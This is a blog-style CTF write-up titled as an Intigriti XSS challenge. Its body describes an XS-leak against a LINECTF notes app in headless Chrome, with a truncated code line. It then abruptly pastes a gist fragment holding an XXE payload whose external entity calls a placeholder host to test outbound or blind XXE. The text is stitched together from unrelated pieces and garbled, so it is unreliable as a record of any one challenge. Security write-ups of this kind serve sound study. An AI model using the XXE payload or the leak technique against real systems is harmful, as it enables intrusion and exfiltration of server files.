layout | title | subtitle | cover-img | thumbnail-img | share-img | tags | |
---|---|---|---|---|---|---|---|
post |
Intigriti's Nov XSS Challenge Writeup |
XSS |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
/assets/img/wsc.jpg |
|
XS-leaks while download in headless-chrome.
There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q
exists in notes.
Download doesn't work in headless chrome, so it throws an error.
page.goto(url).then(() => {
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |